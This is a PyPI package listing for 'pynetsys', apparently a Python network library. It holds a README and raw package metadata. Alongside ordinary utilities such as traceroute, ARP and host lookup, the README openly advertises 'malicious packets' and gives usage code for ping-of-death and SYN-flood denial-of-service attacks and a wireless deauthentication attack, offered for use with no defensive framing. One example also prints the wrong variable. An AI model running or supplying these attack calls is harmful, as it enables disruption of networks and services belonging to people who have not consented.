# PYNETSYS
pynetsys is a collection of tools and malicious packets.
Developed by Andrea Vaccaro from ANDRVV (c) 2022
# Installing
Linux, MacOS = ```pip3 install pynetsys --user```
Windows = ```pip install pynetsys --user```
# Tools
```python
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
----------------
isonline = pynetsys.isOnline("python.org") --> bool
print(isonline)
haswebprotocol = pynetsys.hasWebProtocol("http:\\python.org") --> bool
OR
haswebprotocol = pynetsys.hasWebProtocol("python.org") --> bool
print(haswebprotocol)
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("https:\\python.org") --> bool
OR
hasSSLwebprotocol = pynetsys.hasSSLWebProtocol("python.org") --> bool
print(hasSSLwebprotocol)
addwebprotocol = pynetsys.addWebProtocol("python.org") --> str
print(addwebprotocol)
removewebprotocol = pynetsys.removeWebProtocol("https:\\python.org") --> str
OR
removewebprotocol = pynetsys.removeWebProtocol("http:\\python.org") --> str
print(removewebprotocol)
```
# Create malicious packet and send
```python
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
```
Raw data
{
"_id": null,
"home_page": "https://github.com/ANDRVV/pynetsys",
"name": "pynetsys",
"maintainer": "",
"docs_url": null,
"requires_python": "",
"maintainer_email": "",
"keywords": "python,socket,threading,server,client,packet,packets,net,network,wireless,dos,tools,tool,traceroute,arp,tracert,arping,nslookup",
"author": "Andrea Vaccaro (ANDRVV)",
"author_email": "",
"download_url": "https://files.pythonhosted.org/packages/e5/5f/167372274dfa442062ca6586d97bd136e6d40675c4ca7ec8a4727c84f17b/pynetsys-0.1.6.tar.gz",
"platform": null,
"description": "\n# PYNETSYS\n\n\n\npynetsys is a collection of tools and malicious packets.\n\n\n\nDeveloped by Andrea Vaccaro from ANDRVV (c) 2022\n\n\n\n# Installing\n\n\n\nLinux, MacOS = ```pip3 install pynetsys --user```\n\n\n\nWindows = ```pip install pynetsys --user```\n\n\n\n# Tools\n\n\n\n```python\n\nimport pynetsys\n\n\n\ntrace = pynetsys.tool.traceroute(\"python.org\") --> list\n\nprint(trace)\n\n\n\narping = pynetsys.tool.arp() --> dict\n\nprint(arping)\n\n\n\nhostinfo = pynetsys.tool.hostlookup(\"python.org\") --> dict\n\nprint(hostinfo)\n\n\n\nnetworks = pynetsys.tool.networkFinder() --> dict\n\nprint(hostinfo)\n\n\n\n----------------\n\n\n\nisonline = pynetsys.isOnline(\"python.org\") --> bool\n\nprint(isonline)\n\n\n\nhaswebprotocol = pynetsys.hasWebProtocol(\"http:\\\\python.org\") --> bool\n\nOR\n\nhaswebprotocol = pynetsys.hasWebProtocol(\"python.org\") --> bool \n\nprint(haswebprotocol)\n\n\n\nhasSSLwebprotocol = pynetsys.hasSSLWebProtocol(\"https:\\\\python.org\") --> bool\n\nOR\n\nhasSSLwebprotocol = pynetsys.hasSSLWebProtocol(\"python.org\") --> bool \n\nprint(hasSSLwebprotocol)\n\n\n\naddwebprotocol = pynetsys.addWebProtocol(\"python.org\") --> str \n\nprint(addwebprotocol)\n\n\n\nremovewebprotocol = pynetsys.removeWebProtocol(\"https:\\\\python.org\") --> str \n\nOR\n\nremovewebprotocol = pynetsys.removeWebProtocol(\"http:\\\\python.org\") --> str \n\nprint(removewebprotocol)\n\n```\n\n\n\n# Create malicious packet and send\n\n\n\n```python\n\nimport pynetsys\n\n\n\nPACKET, ID = pynetsys.packet.packet(target = \"example.org\", attack = Packets.DEATH_PING)\n\npynetsys.packet.start(PACKET, ID, _verbose = 0)\n\n\n\nPACKET, ID = pynetsys.packet.packet(target = \"example.org\", attack = Packets.SYN_FLOOD)\n\npynetsys.packet.start(PACKET, ID, _verbose = 0)\n\n\n\nPACKET, ID = pynetsys.packet.packet(target = \"aa:bb:cc:dd:ee:ff\", attack = Packets.WIRELESS_DEAUTH)\n\npynetsys.packet.start(PACKET, ID, _verbose = 0)\n\n\n\n```\n",
"bugtrack_url": null,
"license": "BSD 3 License",
"summary": "pynetsys is a collection of tools and malicious packets.",
"version": "0.1.6",
"split_keywords": [
"python",
"socket",
"threading",
"server",
"client",
"packet",
"packets",
"net",
"network",
"wireless",
"dos",
"tools",
"tool",
"traceroute",
"arp",
"tracert",
"arping",
"nslookup"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "9677d62d66a79ab8279d88e08a70900020242606bcb1b329ec96af6775e90d2b",
"md5": "c7fb5c2d37ea3e9745cf82adc10234e5",
"sha256": "97c1201f9043e2053569a4a1c0be67d4e0a5294f18c781b8beec3ddcf0362898"
},
"downloads": -1,
"filename": "pynetsys-0.1.6-py3-none-any.whl",
"has_sig": false,
"md5_digest": "c7fb5c2d37ea3e9745cf82adc10234e5",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": null,
"size": 10246,
"upload_time": "2023-04-09T10:01:46",
"upload_time_iso_8601": "2023-04-09T10:01:46.106837Z",
"url": "https://files.pythonhosted.org/packages/96/77/d62d66a79ab8279d88e08a70900020242606bcb1b329ec96af6775e90d2b/pynetsys-0.1.6-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "e55f167372274dfa442062ca6586d97bd136e6d40675c4ca7ec8a4727c84f17b",
"md5": "728c5fceae149f973ead133e4a82aa7e",
"sha256": "58ef121ed453aaa14abba845c0eb7adb9c2e4741749b9d3c10f28d969af7db88"
},
"downloads": -1,
"filename": "pynetsys-0.1.6.tar.gz",
"has_sig": false,
"md5_digest": "728c5fceae149f973ead133e4a82aa7e",
"packagetype": "sdist",
"python_version": "source",
"requires_python": null,
"size": 10133,
"upload_time": "2023-04-09T10:01:48",
"upload_time_iso_8601": "2023-04-09T10:01:48.363748Z",
"url": "https://files.pythonhosted.org/packages/e5/5f/167372274dfa442062ca6586d97bd136e6d40675c4ca7ec8a4727c84f17b/pynetsys-0.1.6.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-04-09 10:01:48",
"github": true,
"gitlab": false,
"bitbucket": false,
"github_user": "ANDRVV",
"github_project": "pynetsys",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [],
"lcname": "pynetsys"
}